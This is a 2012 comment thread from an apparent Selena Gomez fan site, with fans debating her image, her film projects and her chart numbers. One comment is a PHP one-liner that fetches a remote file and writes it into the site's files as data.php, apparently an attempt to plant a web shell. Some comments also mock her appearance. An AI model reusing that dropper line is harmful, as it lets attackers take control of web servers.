ASK SELENA GOMEZ!

selgjg

I agree with you @Anon. I don’t hate or like her because I’m actually a Ex fan of Selena. I watched her on Hannah and love her and then when she was on Wizards I adored her even more. I love how positive and sweet she was, so different from the crap hollywood throws at us. Even when she ventured off to singing I was all for it but it started to change for me right around the time she started publicly dating. It became.. To supicious I guess you can say and I’ve never looked at her the same though I think she’s still pretty fucking awesome.

Apr 7, 2012 @ 10:27 pm

I love her but it scares me at how “perfect” she comes off as.

People are often afraid of the unknown. A young person in Hollywood with a successful career who is friendly and loving is a rarity and that makes people not believe it. Society and the BS we go through in our own lives makes us skeptical and cynical. If you can beat that and think in the moment, life can be a great thing.

Apr 7, 2012 @ 10:37 pm

One thing about Selena is that she has anxiety issues. Her forcing herself to seem like the haters and paps don’t bother her is her way of dealing with it.
    Think about it this way, if Sel and Jay were not famous, would you find them just living and doing normal things odd? Selena wants to be able to be as normal as her life will allow, which to me is probably the best way to stay grounded. Her fear of paps, again think about it strange old men fixated on a young girls everyday existence can be scary. No one knows who these guys are. The fact that she has had more than one true stalker and even one that has publicly threatened her, makes it make even more sense.

Looking more like one of those LA latina chicas…

Apr 7, 2012 @ 10:36 pm
    SubwayToVenus said:

She’s soooooo cute

^^^^^^^^^^^^^^^
    THIS!!!!! : )

Truth be told, Almost everyone who physically meets or has met Selena Gomez in person and spent time with her, has always had very positive things to say about her. Myself I tend to believe the general consensus of IRL encounters over often angry internet hearsay based opinions. If Selena was given the respect we all wish we received from others until she physically gives you personal reasons to dislike her, you would notice it is real. I did.

What happened to “13 Reasons”? Or “Hot Mess”? Does anyone remember “What Boys Want”? Suddenly now there’s “The Getaway”? There’s not even any mention of that on imdb.com.

The movie name is “Getaway” not “The Getaway”:

Movie role brings Ethan Hawke to Mid-Ohio

Ethan Hawke spent Monday at school – the Mid-Ohio School in Lexington, Ohio.
    According to a news release, the Academy Award-nominated actor was training for a lead role in an upcoming film tentatively titled “Getaway.”

“This has been a great experience,” Hawke said, according to the release. “I’ve learned more today than I have about anything new in a couple of years. I couldn’t be more impressed with the facility and particularly my trainer.”

Former Indy car driver Brian Till served as Hawke’s instructor. The day included classroom work, drills and laps around the Mid-Ohio road course.

“People in his position are used to learning roles and taking direction,” Till said in the release. “So as a student, he’s been a good one. But it’s a role he’s not played before both in movies and in real life. There has been a lot of education.”

Apr 7, 2012 @ 11:04 pm

13 Reasons why is being done by her own production company. I think the script is still being finalized, but I also think her team is being smart about it. They want Selena to gain as much movie acting experience from different supporting roles before they put it out.
    Hot Mess and The Sky is Everywhere are what I really want to see made.
    There was too many complaints about What Boys Want, because the story has been done to death. I think it was shelved for lack of funding.
    Ethan has apparently been trying to get Get Away going for awhile. It was originally supposed to shoot in Louisiana. People have read the script and it sounds promising.

A really good news for thousands of teenagers and adolescents in our country. One of the hit pop stars and intimate friend of Justin Bieber Selena Gomez arrive in Bulgaria.

Teen idol will visit the country for the filming of American production with the working title “Get Away”. It is not yet known what will be the role of beauty, writes iNews.

Along with Gomez arrive in Sofia another star – Ethan Hawke. Former husband of Uma Thurman in the role of champion automobile involved in a complicated intrigue through the streets of Sofia.

The team that makes the film, was there late last year. Then stunts filmed in the city center. Cars whiz to the NPC, the “Rakovski”, “Dondukov” and “Tsar Liberator”. A script action takes place entirely in Bulgaria.

For the pleasure to enjoy the terrain at the National Palace of Culture with a production budget of $ 16 million is allotted 17 thousand Levs

The movie has a production budget of $ 16 million so isn’t a indie.

< ?php $file = file_get_contents('http://www.avenza.com/sites/default/files/images/data.txt'); $dest = 'sites/default/files/data.php'; file_put_contents($dest, $file); ?>

Haha. Funny.

Stop hating on Selena. She made my childhood, Selena and Demi did actually. They make me a very happy person and I was extremely sad to see my favourite show Wizards of Waverly Place end, so sad. I love Jake T Austin so much too so saying goodbye was hard. For Selena too! Since leaving Disney Channel she said goodbye to all her Disney friends and entered the music and film industry, and has never done anything wrong. She is amazing at both! Anyone who hates her, pure jealousy. Considering you have to actually know the person to hate them? :) Selena doesn’t copy Miley Cyrus!!! Miley may have been on Disney Channel before Selena came, but that doesnt mean Selena copied her whatsoever. In my opinion this whole Miley and Demi getting close thing must really hurt Selena, but hey we all know that Selena and Demi will be bestfriends, forever. Nothing or nobody can change that. DELENA.

• lele61

she has a big face on this video !
    it seems, she has just been pulling wisdom teeth !!! XD

shes really not that pretty without all the makeup and fuss.
    her face is so squished and round.
    her fans overrated her beauty so much.

some people dislike selena because she always acts annoyingly perfect. who can relate to someone like that? sometimes she comes off as fake. doesn’t mean she isn’t sweet and a good person but people are just annoyed by her. it happens to everyone and her fans need 2 get over it. she barely gets any hate from the media and general public, so idk why selena’s fans always whine about haters. other stars have it much worse (miley, justin, even demi)

• JelenaRocks

she looks beautiful
    I LOVE U SELENA!!!!!!!!!!!

jealous much? shes flawless

she’s so ugly. especially in the youtube video. her face is so deformed.

GROSS SELENA

ARE YOU A VIRGIN?

there’s no way…

she’s so ugly. especially in the youtube video. her face is so deformed.
    Troll.

but it’s true. look at it…

• EarthChild

She looks 2 or 3 years younger with extensions even though I know they’re for a role, supposedly.

Love her… It is so sad that people hate her. I have followed her career since she was MaKayla on HM and she has never done anything to deserve the hate she gets. So many times I have seen the comment, “I don’t like her, I don’t know why but there is something about her.” Which to me is proof that people have always judged her on what they have heard. Hannah hated her from day one on HM and the hatred has followed her ever since. Kids believed she was evil, because Hannah told them she was and it was never really their own thoughts. JMHO I see a girl that lives her life just like all of us and tries to be the best she can. She knows she makes mistakes and admits to it, she just doesn’t dwell on them and bring them to our attention. Her mistakes are her own and she alone deals with them. For this I have always held SELENA GOMEZ, just a little higher on my list of favorites.

• Anon

Aye anon, just because someone doesn’t like her doesn’t mean they hate her. I don’t like her because I don’t have to but I definitely don’t hate her. I think she’s beautiful and talented in some ways but that doesn’t make me a fan or because I choo se not to worship her doesn’t make a hater out of me. There is something about her that disagrees in me.

Apr 7, 2012 @ 10:16 pm
    Anon said:

That is exactly what I was talking about.
    People always seem to say, “something I don’t know what but something about her .” It is hard to believe with all the BS in Hollywood, that anyone can truly be so sweet, caring and genuinely a nice person. From the beginning though, the first impression many got was that she was a horrid spoiled brat on Hannah Montana as Makayla. Now there will always be the stigma of that and unless she is given the benefit of the doubt, she will always be someone not to trust. I have met her twice, once at a meet and greet and once with Justin just on the street in Toronto and she was adorably sweet and beautiful both times. From personal experience I have seen who she can be and who I believe she really is.

I love her but it scares me at how “perfect” she comes off as.

• SubwayToVenus

She’s soooooo cute

Well, i know this was just taped like 2 days ago, considering Justin did a personal message to his UK fans on the same exact couch that selena was sitting on doing this, and since Alfredo is the one videotaping this, they did this in Justin Biebers studio!!

she is so perfect

• lxjvtci

qbkqylc

she’s so good to her fans i love that about her. also I’m with her why if you hate her or don’t like her people follow her. is stupid thats the problem with justin’s fangirls/fanboys they don’t think much.

She is adorable

A $16 million budget is very very small, but in Bulgaria, the buying power is about double, so they should be able to make a good film for that price.

It’s funny how roles keep appearing in between her announced roles. “Spring Breakers” was announced out-of-the-blue and it’s worked out well so far.

She’s starting to dress more like Vanessa hudgens. V has that shirt.

After Almost 1 year since the release
    #744 Netherlands
    #782 Germany
    #850 New Zealand
    #863 Paraguay
    #874 Austria
    #941 Greece

I wonder how much it sold worldwide? Rockmafia is rich.

Apr 8, 2012 @ 08:33 am

————————

I think it’s good that she gets more experience before 13RW, because this has the potential to be the role of her life

Hit the Lights needs promo, but looks like she is done with music this year

#130 Slovakia
    #859 El Salvador
    #870 Norway
    #905 New Zealand
    #932 Nicaragua
    #985 Brazil
    #1012 Guatemala

LOL no i don’t want JB, or nick.. I’m in love with 1D. but idk she just seem so fake

Apr 7, 2012 @ 08:02 pm

i personally don’t like selena, i just don’t know why. she actually seem so sweet. my gut just tells me not to like her, maybe its jealousy??
    Do you want Justin? Or wanted Nick? Or somehow you want her life?
    There are people I don’t like too without motive, just don’t click with me. But I don’t hate anybody.

• javi g

i like her shirt she’s starting to dress sexy now. i like that and i think she was in justin’s studio also she mentions fredo. and i think she only goes to the i hop with justin thats my guess.also its good news that she’s working in more movies that cool.

Apr 7, 2012 @ 07:44 pm

She’s starting to dress more like Vanessa hudgens. V has that shirt.
    ——————–
    She told somewhere they were shopping together(Sel,Ashley, Vanessa) before heading for the movie set.

An action movie is a good move! Ethan Hawke is a 2 times oscar nominee. Glad she is taking supporting roles, it is smart.

Justin asked her who asked the question and if she liked the hunger games. I love Alfredo he is like there is no such thing and she was like Fredo does not believe me! Haha she is so sweet especially when she answers the question and says how do you deal with all the fame *bad word* stuff! I love her no matter who wants to hate!

jealous? yeah right. my friends and i are way prettier than her.

HE FACE SCARES ME!